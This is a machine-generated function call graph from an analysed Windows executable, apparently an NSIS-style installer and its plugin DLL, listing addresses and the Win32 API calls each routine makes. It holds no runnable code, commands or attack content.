7347184a 5031->5032 5074 73471bff 5032->5074 5034 73471851 5035 73471976 5034->5035 5036 73471862 5034->5036 5037 73471869 5034->5037 5035->5023 5124 7347243e 5036->5124 5108 73472480 5037->5108 5042 734718af 5137 73472655 5042->5137 5043 734718cd 5046 734718d3 5043->5046 5047 7347191e 5043->5047 5044 7347187f 5049 73471885 5044->5049 5050 73471890 5044->5050 5045 73471898 5057 7347188e 5045->5057 5134 73472e23 5045->5134 5156 73471666 5046->5156 5054 73472655 10 API calls 5047->5054 5049->5057 5118 73472b98 5049->5118 5128 73472810 5050->5128 5060 7347190f 5054->5060 5055 734718b5 5148 73471654 5055->5148 5057->5042 5057->5043 5065 73471965 5060->5065 5162 73472618 5060->5162 5062 73471896 5062->5057 5063 73472655 10 API calls 5063->5060 5065->5035 5067 7347196f GlobalFree 5065->5067 5067->5035 5070 73471951 5070->5065 5166 734715dd wsprintfW 5070->5166 5071 7347194a FreeLibrary 5071->5070 5073->5028 5169 734712bb GlobalAlloc 5074->5169 5076 73471c26 5170 734712bb GlobalAlloc 5076->5170 5078 73471e6b GlobalFree GlobalFree GlobalFree 5079 73471e88 5078->5079 5092 73471ed2 5078->5092 5080 7347227e 5079->5080 5088 73471e9d 5079->5088 5079->5092 5082 734722a0 GetModuleHandleW 5080->5082 5080->5092 5081 73471d26 GlobalAlloc 5098 73471c31 5081->5098 5084 734722c6 5082->5084 5085 734722b1 LoadLibraryW 5082->5085 5083 73471d8f GlobalFree 5083->5098 5177 734716bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5084->5177 5085->5084 5085->5092 5086 73471d71 lstrcpyW 5087 73471d7b lstrcpyW 5086->5087 5087->5098 5088->5092 5173 734712cc 5088->5173 5090 73472318 5090->5092 5095 73472325 lstrlenW 5090->5095 5091 73472126 5176 734712bb GlobalAlloc 5091->5176 5092->5034 5178 734716bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5095->5178 5096 734722d8 5096->5090 5106 73472302 GetProcAddress 5096->5106 5098->5078 5098->5081 5098->5083 5098->5086 5098->5087 5098->5091 5098->5092 5099 73472067 GlobalFree 5098->5099 5100 734721ae 5098->5100 5101 734712cc 2 API calls 5098->5101 5102 73471dcd 5098->5102 5099->5098 5100->5092 5105 73472216 lstrcpyW 5100->5105 5101->5098 5102->5098 5171 7347162f GlobalSize GlobalAlloc 5102->5171 5103 7347233f 5103->5092 5105->5092 5106->5090 5107 7347212f 5107->5034 5110 73472498 5108->5110 5109 734712cc GlobalAlloc lstrcpynW 5109->5110 5110->5109 5112 734725c1 GlobalFree 5110->5112 5114 73472540 GlobalAlloc WideCharToMultiByte 5110->5114 5115 7347256b GlobalAlloc CLSIDFromString 5110->5115 5117 7347258a 5110->5117 5180 7347135a 5110->5180 5112->5110 5113 7347186f 5112->5113 5113->5044 5113->5045 5113->5057 5114->5112 5115->5112 5117->5112 5184 734727a4 5117->5184 5120 73472baa 5118->5120 5119 73472c4f SetFilePointer 5121 73472c6d 5119->5121 5120->5119 5187 73472b42 5121->5187 5123 73472d39 5123->5057 5125 73472453 5124->5125 5126 7347245e GlobalAlloc 5125->5126 5127 73471868 5125->5127 5126->5125 5127->5037 5132 73472840 5128->5132 5129 734728ee 5131 734728f4 GlobalSize 5129->5131 5133 734728fe 5129->5133 5130 734728db GlobalAlloc 5130->5133 5131->5133 5132->5129 5132->5130 5133->5062 5135 73472e2e 5134->5135 5136 73472e6e GlobalFree 5135->5136 5191 734712bb GlobalAlloc 5137->5191 5139 7347265f 5140 7347270b lstrcpynW 5139->5140 5141 734726fa StringFromGUID2 5139->5141 5142 734726d8 MultiByteToWideChar 5139->5142 5143 73472742 GlobalFree 5139->5143 5144 7347271e wsprintfW 5139->5144 5145 73472777 GlobalFree 5139->5145 5146 73471312 2 API calls 5139->5146 5192 73471381 5139->5192 5140->5139 5141->5139 5142->5139 5143->5139 5144->5139 5145->5055 5146->5139 5196 734712bb GlobalAlloc 5148->5196 5150 73471659 5151 73471666 2 API calls 5150->5151 5152 73471663 5151->5152 5153 73471312 5152->5153 5154 73471355 GlobalFree 5153->5154 5155 7347131b GlobalAlloc lstrcpynW 5153->5155 5154->5060 5155->5154 5157 73471672 wsprintfW 5156->5157 5160 7347169f lstrcpyW 5156->5160 5161 734716b8 5157->5161 5160->5161 5161->5063 5163 73472626 5162->5163 5164 73471931 5162->5164 5163->5164 5165 73472642 GlobalFree 5163->5165 5164->5070 5164->5071 5165->5163 5167 73471312 2 API calls 5166->5167 5168 734715fe 5167->5168 5168->5065 5169->5076 5170->5098 5172 7347164d 5171->5172 5172->5102 5179 734712bb GlobalAlloc 5173->5179 5175 734712db lstrcpynW 5175->5092 5176->5107 5177->5096 5178->5103 5179->5175 5181 73471361 5180->5181 5182 734712cc 2 API calls 5181->5182 5183 7347137f 5182->5183 5183->5110 5185 734727b2 VirtualAlloc 5184->5185 5186 73472808 5184->5186 5185->5186 5186->5117 5188 73472b4d 5187->5188 5189 73472b52 GetLastError 5188->5189 5190 73472b5d 5188->5190 5189->5190 5190->5123 5191->5139 5193 734713ac 5192->5193 5194 7347138a 5192->5194 5193->5139 5194->5193 5195 73471390 lstrcpyW 5194->5195 5195->5193 5196->5150 5426 402b5e 5427 402bb0 5426->5427 5428 402b65 5426->5428 5430 406a76 5 API calls 5427->5430 5429 402bae 5428->5429 5432 402d89 21 API calls 5428->5432 5431 402bb7 5430->5431 5433 402dab 21 API calls 5431->5433 5434 402b73 5432->5434 5435 402bc0 5433->5435 5436 402d89 21 API calls 5434->5436 5435->5429 5437 402bc4 IIDFromString 5435->5437 5439 402b7f 5436->5439 5437->5429 5438 402bd3 5437->5438 5438->5429 5444 406682 lstrcpynW 5438->5444 5443 4065c9 wsprintfW 5439->5443 5441 402bf0 CoTaskMemFree 5441->5429 5443->5429 5444->5441 5445 73471058 5447 73471074 5445->5447 5446 734710dd 5447->5446 5449 73471092 5447->5449 5458 734715b6 5447->5458 5450 734715b6 GlobalFree 5449->5450 5451 734710a2 5450->5451 5452 734710b2 5451->5452 5453 734710a9 GlobalSize 5451->5453 5454 734710b6 GlobalAlloc 5452->5454 5455 734710c7 5452->5455 5453->5452 5456 734715dd 3 API calls 5454->5456 5457 734710d2 GlobalFree 5455->5457 5456->5455 5457->5446 5460 734715bc 5458->5460 5459 734715c2 5459->5449 5460->5459 5461 734715ce GlobalFree 5460->5461 5461->5449 5462 402a60 5463 402d89 21 API calls 5462->5463 5464 402a66 5463->5464 5465 402aa9 5464->5465 5466 402a8d 5464->5466 5471 402933 5464->5471 5469 402ac3 5465->5469 5470 402ab3 5465->5470 5467 402a92 5466->5467 5468 402aa3 5466->5468 5476 406682 lstrcpynW 5467->5476 5477 4065c9 wsprintfW 5468->5477 5472 4066bf 21 API calls 5469->5472 5473 402d89 21 API calls 5470->5473 5472->5471 5473->5471 5476->5471 5477->5471 4235 401761 4241 402dab 4235->4241 4239 40176f 4240 4061a1 2 API calls 4239->4240 4240->4239 4242 402db7 4241->4242 4251 4066bf 4242->4251 4245 401768 4247 4061a1 4245->4247 4248 4061ae GetTickCount GetTempFileNameW 4247->4248 4249 4061e8 4248->4249 4250 4061e4 4248->4250 4249->4239 4250->4248 4250->4249 4266 4066ca 4251->4266 4252 406911 4253 402dd8 4252->4253 4290 406682 lstrcpynW 4252->4290 4253->4245 4268 406930 4253->4268 4255 4068e2 lstrlenW 4255->4266 4259 4067db GetSystemDirectoryW 4259->4266 4260 4066bf 15 API calls 4260->4255 4261 4067f1 GetWindowsDirectoryW 4261->4266 4262 4066bf 15 API calls 4262->4266 4263 406883 lstrcatW 4263->4266 4264 406930 5 API calls 4264->4266 4266->4252 4266->4255 4266->4259 4266->4260 4266->4261 4266->4262 4266->4263 4266->4264 4267 406853 SHGetPathFromIDListW CoTaskMemFree 4266->4267 4277 406550 4266->4277 4282 406a76 GetModuleHandleA 4266->4282 4288 4065c9 wsprintfW 4266->4288 4289 406682 lstrcpynW 4266->4289 4267->4266 4275 40693d 4268->4275 4269 4069b8 CharPrevW 4271 4069b3 4269->4271 4270 4069a6 CharNextW 4270->4271 4270->4275 4271->4269 4272 4069d9 4271->4272 4272->4245 4274 406992 CharNextW 4274->4275 4275->4270 4275->4271 4275->4274 4276 4069a1 CharNextW 4275->4276 4298 405f7e 4275->4298 4276->4270 4291 4064ef 4277->4291 4280 4065b4 4280->4266 4281 406584 RegQueryValueExW RegCloseKey 4281->4280 4283 406a92 4282->4283 4284 406a9c GetProcAddress 4282->4284 4295 406a06 GetSystemDirectoryW 4283->4295 4286 406aab 4284->4286 4286->4266 4287 406a98 4287->4284 4287->4286 4288->4266 4289->4266 4290->4253 4292 4064fe 4291->4292 4293 406502 4292->4293 4294 406507 RegOpenKeyExW 4292->4294 4293->4280 4293->4281 4294->4293 4296 406a28 wsprintfW LoadLibraryExW 4295->4296 4296->4287 4299 405f84 4298->4299 4300 405f9a 4299->4300 4301 405f8b CharNextW 4299->4301 4300->4275 4301->4299 5478 401d62 5479 402d89 21 API calls 5478->5479 5480 401d73 SetWindowLongW 5479->5480 5481 402c2f 5480->5481 5482 4028e3 5483 4028eb 5482->5483 5484 4028ef FindNextFileW 5483->5484 5486 402901 5483->5486 5485 402948 5484->5485 5484->5486 5488 406682 lstrcpynW 5485->5488 5488->5486 5489 734710e1 5490 73471111 5489->5490 5491 734712b0 GlobalFree 5490->5491 5492 734711d7 GlobalAlloc 5490->5492 5493 73471240 GlobalFree 5490->5493 5494 7347135a 2 API calls 5490->5494 5495 734712ab 5490->5495 5496 73471312 2 API calls 5490->5496 5497 7347129a GlobalFree 5490->5497 5498 73471381 lstrcpyW 5490->5498 5499 7347116b GlobalAlloc 5490->5499 5492->5490 5493->5490 5494->5490 5495->5491 5496->5490 5497->5490 5498->5490 5499->5490 5500 401568 5501 402ba9 5500->5501 5504 4065c9 wsprintfW 5501->5504 5503 402bae 5504->5503 5512 40196d 5513 402d89 21 API calls 5512->5513 5514 401974 5513->5514 5515 402d89 21 API calls 5514->5515 5516 401981 5515->5516 5517 402dab 21 API calls 5516->5517 5518 401998 lstrlenW 5517->5518 5520 4019a9 5518->5520 5519 4019ea 5520->5519 5524 406682 lstrcpynW 5520->5524 5522 4019da 5522->5519 5523 4019df lstrlenW 5522->5523 5523->5519 5524->5522 5525 40506e GetDlgItem GetDlgItem 5526 4050c0 7 API calls 5525->5526 5537 4052e5 5525->5537 5527 405167 DeleteObject 5526->5527 5528 40515a SendMessageW 5526->5528 5529 405170 5527->5529 5528->5527 5530 4051a7 5529->5530 5531 4066bf 21 API calls 5529->5531 5532 404601 22 API calls 5530->5532 5538 405189 SendMessageW SendMessageW 5531->5538 5539 4051bb 5532->5539 5533 405473 5535 405485 5533->5535 5536 40547d SendMessageW 5533->5536 5534 4053c7 5534->5533 5540 405420 SendMessageW 5534->5540 5568 4052d8 5534->5568 5547 405497 ImageList_Destroy 5535->5547 5548 40549e 5535->5548 5553 4054ae 5535->5553 5536->5535 5537->5534 5559 405354 5537->5559 5579 404fbc SendMessageW 5537->5579 5538->5529 5544 404601 22 API calls 5539->5544 5545 405435 SendMessageW 5540->5545 5540->5568 5541 4053b9 SendMessageW 5541->5534 5542 404668 8 API calls 5546 405674 5542->5546 5556 4051cc 5544->5556 5550 405448 5545->5550 5547->5548 5552 4054a7 GlobalFree 5548->5552 5548->5553 5549 4052a7 GetWindowLongW SetWindowLongW 5555 4052c0 5549->5555 5561 405459 SendMessageW 5550->5561 5551 405628 5554 40563a ShowWindow GetDlgItem ShowWindow 5551->5554 5551->5568 5552->5553 5553->5551 5572 4054e9 5553->5572 5584 40503c 5553->5584 5554->5568 5557 4052c5 ShowWindow 5555->5557 5558 4052dd 5555->5558 5556->5549 5560 40521f SendMessageW 5556->5560 5562 4052a2 5556->5562 5565 405271 SendMessageW 5556->5565 5566 40525d SendMessageW 5556->5566 5577 404636 SendMessageW 5557->5577 5578 404636 SendMessageW 5558->5578 5559->5534 5559->5541 5560->5556 5561->5533 5562->5549 5562->5555 5565->5556 5566->5556 5568->5542 5569 4055f3 5570 4055fe InvalidateRect 5569->5570 5573 40560a 5569->5573 5570->5573 5571 405517 SendMessageW 5576 40552d 5571->5576 5572->5571 5572->5576 5573->5551 5593 404f77 5573->5593 5575 4055a1 SendMessageW SendMessageW 5575->5576 5576->5569 5576->5575 5577->5568 5578->5537 5580 40501b SendMessageW 5579->5580 5581 404fdf GetMessagePos ScreenToClient SendMessageW 5579->5581 5582 405013 5580->5582 5581->5582 5583 405018 5581->5583 5582->5559 5583->5580 5596 406682 lstrcpynW 5584->5596 5586 40504f 5597 4065c9 wsprintfW 5586->5597 5588 405059 5589 40140b 2 API calls 5588->5589 5590 405062 5589->5590 5598 406682 lstrcpynW 5590->5598 5592 405069 5592->5572 5599 404eae 5593->5599 5595 404f8c 5595->5551 5596->5586 5597->5588 5598->5592 5600 404ec7 5599->5600 5601 4066bf 21 API calls 5600->5601 5602 404f2b 5601->5602 5603 4066bf 21 API calls 5602->5603 5604 404f36 5603->5604 5605 4066bf 21 API calls 5604->5605 5606 404f4c lstrlenW wsprintfW SetDlgItemTextW 5605->5606 5606->5595 5607 734723e9 5608 73472453 5607->5608 5609 7347245e GlobalAlloc 5608->5609 5610 7347247d 5608->5610 5609->5608 5611 40166f 5612 402dab 21 API calls 5611->5612 5613 401675 5612->5613 5614 4069df 2 API calls 5613->5614 5615 40167b 5614->5615 5616 402af0 5617 402d89 21 API calls 5616->5617 5618 402af6 5617->5618 5619 4066bf 21 API calls 5618->5619 5620 402933 5618->5620 5619->5620 4877 4026f1 4878 402d89 21 API calls 4877->4878 4880 402700 4878->4880 4879 40283d 4880->4879 4881 40274a ReadFile 4880->4881 4882 4027e3 4880->4882 4883 4061f5 ReadFile 4880->4883 4885 40278a MultiByteToWideChar 4880->4885 4886 40283f 4880->4886 4888 4027b0 SetFilePointer MultiByteToWideChar 4880->4888 4889 402850 4880->4889 4881->4879 4881->4880 4882->4879 4882->4880 4891 406253 SetFilePointer 4882->4891 4883->4880 4885->4880 4900 4065c9 wsprintfW 4886->4900 4888->4880 4889->4879 4890 402871 SetFilePointer 4889->4890 4890->4879 4892 40626f 4891->4892 4895 406287 4891->4895 4893 4061f5 ReadFile 4892->4893 4894 40627b 4893->4894 4894->4895 4896 406290 SetFilePointer 4894->4896 4897 4062b8 SetFilePointer 4894->4897 4895->4882 4896->4897 4898 40629b 4896->4898 4897->4895 4899 406224 WriteFile 4898->4899 4899->4895 4900->4879 5621 404771 lstrlenW 5622 404790 5621->5622 5623 404792 WideCharToMultiByte 5621->5623 5622->5623 5624 404af2 5625 404b1e 5624->5625 5626 404b2f 5624->5626 5685 405cc6 GetDlgItemTextW 5625->5685 5627 404b3b GetDlgItem 5626->5627 5632 404b9a 5626->5632 5629 404b4f 5627->5629 5634 404b63 SetWindowTextW 5629->5634 5637 405ffc 4 API calls 5629->5637 5630 404c7e 5683 404e2d 5630->5683 5687 405cc6 GetDlgItemTextW 5630->5687 5631 404b29 5633 406930 5 API calls 5631->5633 5632->5630 5639 4066bf 21 API calls 5632->5639 5632->5683 5633->5626 5638 404601 22 API calls 5634->5638 5636 404668 8 API calls 5641 404e41 5636->5641 5642 404b59 5637->5642 5643 404b7f 5638->5643 5644 404c0e SHBrowseForFolderW 5639->5644 5640 404cae 5645 406059 18 API calls 5640->5645 5642->5634 5649 405f51 3 API calls 5642->5649 5646 404601 22 API calls 5643->5646 5644->5630 5647 404c26 CoTaskMemFree 5644->5647 5648 404cb4 5645->5648 5650 404b8d 5646->5650 5651 405f51 3 API calls 5647->5651 5688 406682 lstrcpynW 5648->5688 5649->5634 5686 404636 SendMessageW 5650->5686 5653 404c33 5651->5653 5656 404c6a SetDlgItemTextW 5653->5656 5660 4066bf 21 API calls 5653->5660 5655 404b93 5659 406a76 5 API calls 5655->5659 5656->5630 5657 404ccb 5658 406a76 5 API calls 5657->5658 5667 404cd2 5658->5667 5659->5632 5661 404c52 lstrcmpiW 5660->5661 5661->5656 5663 404c63 lstrcatW 5661->5663 5662 404d13 5689 406682 lstrcpynW 5662->5689 5663->5656 5665 404d1a 5666 405ffc 4 API calls 5665->5666 5668 404d20 GetDiskFreeSpaceW 5666->5668 5667->5662 5671 405f9d 2 API calls 5667->5671 5672 404d6b 5667->5672 5670 404d44 MulDiv 5668->5670 5668->5672 5670->5672 5671->5667 5673 404ddc 5672->5673 5675 404f77 24 API calls 5672->5675 5674 404dff 5673->5674 5676 40140b 2 API calls 5673->5676 5690 404623 EnableWindow 5674->5690 5677 404dc9 5675->5677 5676->5674 5678 404dde SetDlgItemTextW 5677->5678 5679 404dce 5677->5679 5678->5673 5681 404eae 24 API calls 5679->5681 5681->5673 5682 404e1b 5682->5683 5684 404a4b SendMessageW 5682->5684 5683->5636 5684->5683 5685->5631 5686->5655 5687->5640 5688->5657 5689->5665 5690->5682 5691 73471774 5692 734717a3 5691->5692 5693 73471bff 22 API calls 5692->5693 5694 734717aa 5693->5694 5695 734717b1 5694->5695 5696 734717bd 5694->5696 5697 73471312 2 API calls 5695->5697 5698 734717c7 5696->5698 5699 734717e4 5696->5699 5703 734717bb 5697->5703 5700 734715dd 3 API calls 5698->5700 5701 7347180e 5699->5701 5702 734717ea 5699->5702 5704 734717cc 5700->5704 5706 734715dd 3 API calls 5701->5706 5705 73471654 3 API calls 5702->5705 5707 73471654 3 API calls 5704->5707 5708 734717ef 5705->5708 5706->5703 5709 734717d2 5707->5709 5710 73471312 2 API calls 5708->5710 5711 73471312 2 API calls 5709->5711 5712 734717f5 GlobalFree 5710->5712 5713 734717d8 GlobalFree 5711->5713 5712->5703 5714 73471809 GlobalFree 5712->5714 5713->5703 5714->5703 4901 401774 4902 402dab 21 API calls 4901->4902 4903 40177b 4902->4903 4904 4017a3 4903->4904 4905 40179b 4903->4905 4942 406682 lstrcpynW 4904->4942 4941 406682 lstrcpynW 4905->4941 4908 4017a1 4912 406930 5 API calls 4908->4912 4909 4017ae 4910 405f51 3 API calls 4909->4910 4911 4017b4 lstrcatW 4910->4911 4911->4908 4931 4017c0 4912->4931 4913 4017fc 4915 40614d 2 API calls 4913->4915 4914 4069df 2 API calls 4914->4931 4915->4931 4917 4017d2 CompareFileTime 4917->4931 4918 401892 4920 405707 28 API calls 4918->4920 4919 401869 4921 405707 28 API calls 4919->4921 4929 40187e 4919->4929 4923 40189c 4920->4923 4921->4929 4922 406682 lstrcpynW 4922->4931 4924 403376 48 API calls 4923->4924 4925 4018af 4924->4925 4926 4018c3 SetFileTime 4925->4926 4927 4018d5 CloseHandle 4925->4927 4926->4927 4927->4929 4930 4018e6 4927->4930 4928 4066bf 21 API calls 4928->4931 4932 4018eb 4930->4932 4933 4018fe 4930->4933 4931->4913 4931->4914 4931->4917 4931->4918 4931->4919 4931->4922 4931->4928 4936 405ce2 MessageBoxIndirectW 4931->4936 4940 406172 GetFileAttributesW CreateFileW 4931->4940 4934 4066bf 21 API calls 4932->4934 4935 4066bf 21 API calls 4933->4935 4937 4018f3 lstrcatW 4934->4937 4938 401906 4935->4938 4936->4931 4937->4938 4938->4929 4939 405ce2 MessageBoxIndirectW 4938->4939 4939->4929 4940->4931 4941->4908 4942->4909 5715 4014f5 SetForegroundWindow 5716 402c2f 5715->5716 5717 401a77 5718 402d89 21 API calls 5717->5718 5719 401a80 5718->5719 5720 402d89 21 API calls 5719->5720 5721 401a25 5720->5721 4962 73472a7f 4963 73472acf 4962->4963 4964 73472a8f VirtualProtect 4962->4964 4964->4963 5722 401578 5723 401591 5722->5723 5724 401588 ShowWindow 5722->5724 5725 402c2f 5723->5725 5726 40159f ShowWindow 5723->5726 5724->5723 5726->5725 4996 4023f9 4997 402dab 21 API calls 4996->4997 4998 402408 4997->4998 4999 402dab 21 API calls 4998->4999 5000 402411 4999->5000 5001 402dab 21 API calls 5000->5001 5002 40241b GetPrivateProfileStringW 5001->5002 5727 40567b 5728 40568b 5727->5728 5729 40569f 5727->5729 5730 405691 5728->5730 5731 4056e8 5728->5731 5732 4056a7 IsWindowVisible 5729->5732 5738 4056be 5729->5738 5734 40464d SendMessageW 5730->5734 5733 4056ed CallWindowProcW 5731->5733 5732->5731 5735 4056b4 5732->5735 5736 40569b 5733->5736 5734->5736 5737 404fbc 5 API calls 5735->5737 5737->5738 5738->5733 5739 40503c 4 API calls 5738->5739 5739->5731 5740 401ffb 5741 402dab 21 API calls 5740->5741 5742 402002 5741->5742 5743 4069df 2 API calls 5742->5743 5744 402008 5743->5744 5745 402019 5744->5745 5747 4065c9 wsprintfW 5744->5747 5747->5745 5748 401b7c 5749 402dab 21 API calls 5748->5749 5750 401b83 5749->5750 5751 402d89 21 API calls 5750->5751 5752 401b8c wsprintfW 5751->5752 5753 402c2f 5752->5753 5754 73471979 5756 7347199c 5754->5756 5755 734719e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5758 73471312 2 API calls 5755->5758 5756->5755 5757 734719d1 GlobalFree 5756->5757 5757->5755 5759 73471b6e GlobalFree GlobalFree 5758->5759 5760 401000 5761 401037 BeginPaint GetClientRect 5760->5761 5762 40100c DefWindowProcW 5760->5762 5764 4010f3 5761->5764 5765 401179 5762->5765 5766 401073 CreateBrushIndirect FillRect DeleteObject 5764->5766 5767 4010fc 5764->5767 5766->5764 5768 401102 CreateFontIndirectW 5767->5768 5769 401167 EndPaint 5767->5769 5768->5769 5770 401112 6 API calls 5768->5770 5769->5765 5770->5769 5771 401680 5772 402dab 21 API calls 5771->5772 5773 401687 5772->5773 5774 402dab 21 API calls 5773->5774 5775 401690 5774->5775 5776 402dab 21 API calls 5775->5776 5777 401699 MoveFileW 5776->5777 5778 4016a5 5777->5778 5779 4016ac 5777->5779 5780 401423 28 API calls 5778->5780 5781 4069df 2 API calls 5779->5781 5783 4022fb 5779->5783 5780->5783 5782 4016bb 5781->5782 5782->5783 5784 406442 40 API calls 5782->5784 5784->5778 5785 404102 5786 40411a 5785->5786 5787 40427b 5785->5787 5786->5787 5788 404126 5786->5788 5789 4042cc 5787->5789 5790 40428c GetDlgItem GetDlgItem 5787->5790 5791 404131 SetWindowPos 5788->5791 5792 404144 5788->5792 5794 404326 5789->5794 5805 401389 2 API calls 5789->5805 5793 404601 22 API calls 5790->5793 5791->5792 5796 40414d ShowWindow 5792->5796 5797 40418f 5792->5797 5798 4042b6 SetClassLongW 5793->5798 5795 40464d SendMessageW 5794->5795 5799 404276 5794->5799 5826 404338 5795->5826 5800 404239 5796->5800 5801 40416d GetWindowLongW 5796->5801 5802 404197 DestroyWindow 5797->5802 5803 4041ae 5797->5803 5804 40140b 2 API calls 5798->5804 5807 404668 8 API calls 5800->5807 5801->5800 5808 404186 ShowWindow 5801->5808 5809 40458a 5802->5809 5810 4041b3 SetWindowLongW 5803->5810 5811 4041c4 5803->5811 5804->5789 5806 4042fe 5805->5806 5806->5794 5812 404302 SendMessageW 5806->5812 5807->5799 5808->5797 5809->5799 5816 4045bb ShowWindow 5809->5816 5810->5799 5811->5800 5815 4041d0 GetDlgItem 5811->5815 5812->5799 5813 40140b 2 API calls 5813->5826 5814 40458c DestroyWindow EndDialog 5814->5809 5817 4041e1 SendMessageW IsWindowEnabled 5815->5817 5818 4041fe 5815->5818 5816->5799 5817->5799 5817->5818 5820 40420b 5818->5820 5821 404252 SendMessageW 5818->5821 5822 40421e 5818->5822 5830 404203 5818->5830 5819 4066bf 21 API calls 5819->5826 5820->5821 5820->5830 5821->5800 5824 404226 5822->5824 5825 40423b 5822->5825 5823 4045da SendMessageW 5823->5800 5827 40140b 2 API calls 5824->5827 5828 40140b 2 API calls 5825->5828 5826->5799 5826->5813 5826->5814 5826->5819 5829 404601 22 API calls 5826->5829 5831 404601 22 API calls 5826->5831 5847 4044cc DestroyWindow 5826->5847 5827->5830 5828->5830 5829->5826 5830->5800 5830->5823 5832 4043b3 GetDlgItem 5831->5832 5833 4043d0 ShowWindow EnableWindow 5832->5833 5834 4043c8 5832->5834 5856 404623 EnableWindow 5833->5856 5834->5833 5836 4043fa EnableWindow 5841 40440e 5836->5841 5837 404413 GetSystemMenu EnableMenuItem SendMessageW 5838 404443 SendMessageW 5837->5838 5837->5841 5838->5841 5840 4040e3 22 API calls 5840->5841 5841->5837 5841->5840 5857 404636 SendMessageW 5841->5857 5858 406682 lstrcpynW 5841->5858 5843 404472 lstrlenW 5844 4066bf 21 API calls 5843->5844 5845 404488 SetWindowTextW 5844->5845 5846 401389 2 API calls 5845->5846 5846->5826 5847->5809 5848 4044e6 CreateDialogParamW 5847->5848 5848->5809 5849 404519 5848->5849 5850 404601 22 API calls 5849->5850 5851 404524 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5850->5851 5852 401389 2 API calls 5851->5852 5853 40456a 5852->5853 5853->5799 5854 404572 ShowWindow 5853->5854 5855 40464d SendMessageW 5854->5855 5855->5809 5856->5836 5857->5841 5858->5843 5859 401503 5860 401508 5859->5860 5862 401520 5859->5862 5861 402d89 21 API calls 5860->5861 5861->5862 5863 401a04 5864 402dab 21 API calls 5863->5864 5865 401a0b 5864->5865 5866 402dab 21 API calls 5865->5866 5867 401a14 5866->5867 5868 401a1b lstrcmpiW 5867->5868 5869 401a2d lstrcmpW 5867->5869 5870 401a21 5868->5870 5869->5870 5871 402304 5872 402dab 21 API calls 5871->5872 5873 40230a 5872->5873 5874 402dab 21 API calls 5873->5874 5875 402313 5874->5875 5876 402dab 21 API calls 5875->5876 5877 40231c 5876->5877 5878 4069df 2 API calls 5877->5878 5879 402325 5878->5879 5880 402336 lstrlenW lstrlenW 5879->5880 5881 402329 5879->5881 5882 405707 28 API calls 5880->5882 5883 405707 28 API calls 5881->5883 5885 402331 5881->5885 5884 402374 SHFileOperationW 5882->5884 5883->5885 5884->5881 5884->5885 5893 401d86 5894 401d99 GetDlgItem 5893->5894 5895 401d8c 5893->5895 5897 401d93 5894->5897 5896 402d89 21 API calls 5895->5896 5896->5897 5898 401dda GetClientRect LoadImageW SendMessageW 5897->5898 5900 402dab 21 API calls 5897->5900 5901 401e44 5898->5901 5902 401e38 5898->5902 5900->5898 5902->5901 5903 401e3d DeleteObject 5902->5903 5903->5901 5904 73471000 5907 7347101b 5904->5907 5908 734715b6 GlobalFree 5907->5908 5909 73471020 5908->5909 5910 73471027 GlobalAlloc 5909->5910 5911 73471024 5909->5911 5910->5911 5912 734715dd 3 API calls 5911->5912 5913 73471019 5912->5913 5914 402388 5915 40238f 5914->5915 5918 4023a2 5914->5918 5916 4066bf 21 API calls 5915->5916 5917 40239c 5916->5917 5917->5918 5919 405ce2 MessageBoxIndirectW 5917->5919 5919->5918 4827 401389 4829 401390 4827->4829 4828 4013fe 4829->4828 4830 4013cb MulDiv SendMessageW 4829->4830 4830->4829 5920 402c0a SendMessageW 5921 402c24 InvalidateRect 5920->5921 5922 402c2f 5920->5922 5921->5922 5923 7347170d 5924 734715b6 GlobalFree 5923->5924 5926 73471725 5924->5926 5925 7347176b GlobalFree 5926->5925 5927 73471740 5926->5927 5928 73471757 VirtualFree 5926->5928 5927->5925 5928->5925 4852 40248f 4853 402dab 21 API calls 4852->4853 4854 4024a1 4853->4854 4855 402dab 21 API calls 4854->4855 4856 4024ab 4855->4856 4869 402e3b 4856->4869 4859 402c2f 4860 4024e3 4862 4024ef 4860->4862 4865 402d89 21 API calls 4860->4865 4861 402dab 21 API calls 4864 4024d9 lstrlenW 4861->4864 4863 40250e RegSetValueExW 4862->4863 4866 403376 48 API calls 4862->4866 4867 402524 RegCloseKey 4863->4867 4864->4860 4865->4862 4866->4863 4867->4859 4870 402e56 4869->4870 4873 40651d 4870->4873 4874 40652c 4873->4874 4875 4024bb 4874->4875 4876 406537 RegCreateKeyExW 4874->4876 4875->4859 4875->4860 4875->4861 4876->4875 5929 402910 5930 402dab 21 API calls 5929->5930 5931 402917 FindFirstFileW 5930->5931 5932 40292a 5931->5932 5933 40293f 5931->5933 5934 402948 5933->5934 5937 4065c9 wsprintfW 5933->5937 5938 406682 lstrcpynW 5934->5938 5937->5934 5938->5932 5939 401911 5940 401948 5939->5940 5941 402dab 21 API calls 5940->5941 5942 40194d 5941->5942 5943 405d8e 71 API calls 5942->5943 5944 401956 5943->5944 5945 401491 5946 405707 28 API calls 5945->5946 5947 401498 5946->5947 5948 403d12 5949 403d1d 5948->5949 5950 403d21 5949->5950 5951 403d24 GlobalAlloc 5949->5951 5951->5950 5959 401914 5960 402dab 21 API calls 5959->5960 5961 40191b 5960->5961 5962 405ce2 MessageBoxIndirectW 5961->5962 5963 401924 5962->5963 4943 402896 4944 40289d 4943->4944 4946 402bae 4943->4946 4945 402d89 21 API calls 4944->4945 4947 4028a4 4945->4947 4948 4028b3 SetFilePointer 4947->4948 4948->4946 4949 4028c3 4948->4949 4951 4065c9 wsprintfW 4949->4951 4951->4946 5964 401f17 5965 402dab 21 API calls 5964->5965 5966 401f1d 5965->5966 5967 402dab 21 API calls 5966->5967 5968 401f26 5967->5968 5969 402dab 21 API calls 5968->5969 5970 401f2f 5969->5970 5971 402dab 21 API calls 5970->5971 5972 401f38 5971->5972 5973 401423 28 API calls 5972->5973 5974 401f3f 5973->5974 5981 405ca8 ShellExecuteExW 5974->5981 5976 401f87 5977 406b21 5 API calls 5976->5977 5978 402933 5976->5978 5979 401fa4 CloseHandle 5977->5979 5979->5978 5981->5976 5982 402f98 5983 402fc3 5982->5983 5984 402faa SetTimer 5982->5984 5985 403011 5983->5985 5986 403017 MulDiv 5983->5986 5984->5983 5988 402fd1 wsprintfW SetWindowTextW SetDlgItemTextW 5986->5988 5988->5985 5989 401d1c 5990 402d89 21 API calls 5989->5990 5991 401d22 IsWindow 5990->5991 5992 401a25 5991->5992 5993 